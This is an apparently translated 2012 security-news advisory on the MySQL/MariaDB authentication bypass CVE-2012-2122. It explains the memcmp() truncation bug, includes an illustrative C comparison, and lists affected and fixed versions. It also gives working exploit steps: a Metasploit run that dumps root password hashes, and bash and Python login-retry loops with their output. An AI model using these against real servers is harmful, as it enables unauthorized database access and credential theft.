MySQL Authentication Bypass Vulnerability and Exploitation (CVE-2012-2122)
Source: http://www.freebuf.com  Author: cs24  Published: 2012-06-12

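When a client connects to MariaDB/MySQL, the supplied password is compared with the expected correct password. Because the result is handled incorrectly, MySQL can treat the two passwords as identical even when memcmp() returns a non-zero value.
In other words, anyone who knows a username can log in to the SQL database directly just by retrying. According to the advisory, roughly one guess in 256 gets through. Exploit tools have already appeared.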
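An added example (not from the original article or from the MySQL/MariaDB source) of the kind of mishandling described above, assuming the int returned by memcmp() is narrowed to a one-byte boolean. The type `my_bool`, the function names and the sample tokens are constructed for illustration; the block counts how many non-zero comparison results are wrongly read as a match and shows the corrected form beside the flawed one.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumption: a one-byte boolean type, standing in for the type the
   flawed comparison result was returned through. */
typedef char my_bool;

/* Flawed pattern: memcmp()'s int result is narrowed to one byte, so any
   non-zero value whose low 8 bits are zero (256, -512, ...) becomes 0,
   which the caller reads as "passwords match". */
static my_bool mismatch_flawed(int cmp) { return (my_bool)cmp; }

/* Corrected pattern: reduce the result to 0 or 1 before narrowing. */
static my_bool mismatch_fixed(int cmp) { return (my_bool)(cmp != 0); }

/* Count non-zero comparison results in [lo, hi] that a checker reports
   as "no mismatch", i.e. wrong passwords that would be accepted. */
static long false_accepts(my_bool (*check)(int), long lo, long hi)
{
    long n = 0;
    for (long v = lo; v <= hi; v++)
        if (v != 0 && check((int)v) == 0)
            n++;
    return n;
}

/* Safe equality test for two fixed-length tokens: only "== 0" is ever
   derived from memcmp(), never its magnitude or a truncated copy. */
static int tokens_equal(const unsigned char *a, const unsigned char *b,
                        size_t n)
{
    return memcmp(a, b, n) == 0;
}

int main(void)
{
    /* Constructed sample tokens (not real credential data). */
    const unsigned char expected[4] = {0x10, 0x20, 0x30, 0x40};
    const unsigned char wrong[4]    = {0x10, 0x20, 0x31, 0x40};

    printf("flawed, results 1..65536: %ld false accepts\n",
           false_accepts(mismatch_flawed, 1, 65536));
    printf("fixed,  results 1..65536: %ld false accepts\n",
           false_accepts(mismatch_fixed, 1, 65536));
    printf("tokens_equal(expected, wrong) = %d\n",
           tokens_equal(expected, wrong, sizeof expected));
    return 0;
}
```

Over the 65536 possible non-zero results in that range, the flawed form accepts 256 of them, which is the one-in-256 rate the advisory describes; the corrected form accepts none.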

Affected products:
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are
vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

A Metasploit module for this flaw has already been published online (download link).

It is used as follows:

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf  auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf  auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf  auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Test method 2:

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Test method 3:

#!/usr/bin/python
import subprocess

while 1:
        subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()

The output looks like this:

relik@stronghold:~# python mysql_bypass.py
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
[... the same "Access denied" line repeats, 199 times in total, before a login succeeds ...]
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
